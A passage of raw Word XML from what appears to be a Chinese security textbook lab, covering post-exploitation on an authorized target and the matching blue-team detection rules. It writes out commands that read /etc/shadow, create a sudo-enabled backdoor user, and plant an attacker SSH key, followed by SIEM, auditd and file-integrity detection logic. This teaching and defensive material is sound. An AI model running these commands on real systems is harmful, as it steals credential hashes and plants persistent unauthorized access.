        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM）看到攻击留下的痕迹，从而理解第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 19 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章检测工程的意义。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">动机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者在获得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限后，通常不会立即退出，而是会尝试建立更隐蔽的持久化访问通道，并收集更多系统信息以便横向移动。理解这些操作有助于蓝队配置针对性的检测规则。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">实操命令（均在靶机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> root Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">中执行，仅用于学习</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">告警特征）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 1. 提取密码哈希（从 /etc/shadow）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 可以使用 hashcat 离线破解（见第 18 章），但本节的目标是产生日志痕迹。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 2. 创建后门用户（持久化示例）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">useradd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/bash backdoor_user</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"backdoor_user:password123"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">chpasswd</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">usermod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-aG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo backdoor_user</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 3. 添加 SSH 公钥（免密后门）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /root/.ssh</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;ATTACKER_PUBLIC_KEY&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /root/.ssh/authorized_keys ②</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 4. 检查系统信息（横向移动准备）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 网络配置</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-tulpn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 监听端口和关联进程</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/hosts </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 内部主机名解析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">这些操作为什么重要——从检测视角看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">操作可通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Auditd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">openat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">read</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统调用审计捕获。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">www-data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">账户（非系统管理员）读取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应触发高危告警。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">useradd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">chpasswd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令会写入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。文件完整性监控（FIM）应检测到这些文件的修改。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">追加公钥是常见的持久化手段，HIDS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应监控</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">~/.ssh/authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的写入操作。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以上行为的综合出现（提权后短时间内一系列账户和文件操作）构成一个高置信度的攻击链事件，应触发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的关联告警。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提醒</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在授权靶机上执行上述操作后，建议在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中查看对应的原始日志和关联告警，以加深对第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 19 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章“攻击-检测对偶”的理解。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">【防御对照框</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤九】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队检测与修复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测（SIEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">关联规则）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">source.process == "/bin/cat" AND file.path == "/etc/shadow" AND user != "root"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">立即告警。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2：监控</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/group</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">三个文件的任何修改（FIM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Auditd），并与合法的补丁管理窗口进行对照，非窗口期的修改即为入侵。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3：监控</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件的创建或内容追加，尤其当</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">守护进程未处于安装/配置维护期时。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">修复与应急响应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一旦确认上述持久化迹象，应立即隔离受感染主机（通过网络</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ACL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或交换机端口关闭），使用已知干净的基础镜像（Golden</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Image）进行系统重装，切勿尝试“清理”后门——攻击者可能已植入多个难以发现的后门（见</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NIST SP 800-61 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">计算机安全事故处理指南）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在重建系统后，审计所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">私钥是否已被替换或泄露，重置所有关联系统的密码和凭证。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="397"/>
    <w:bookmarkStart w:id="398" w:name="完整攻击链-mermaid-图"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22.1.12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">完整攻击链</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mermaid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以下</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mermaid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流程图总结了本节从侦察到后渗透的完整</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">kill-chain。该图可直接用于渗透测试报告的“攻击路径图”章节，也适用于检测工程师做攻击路径建模。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
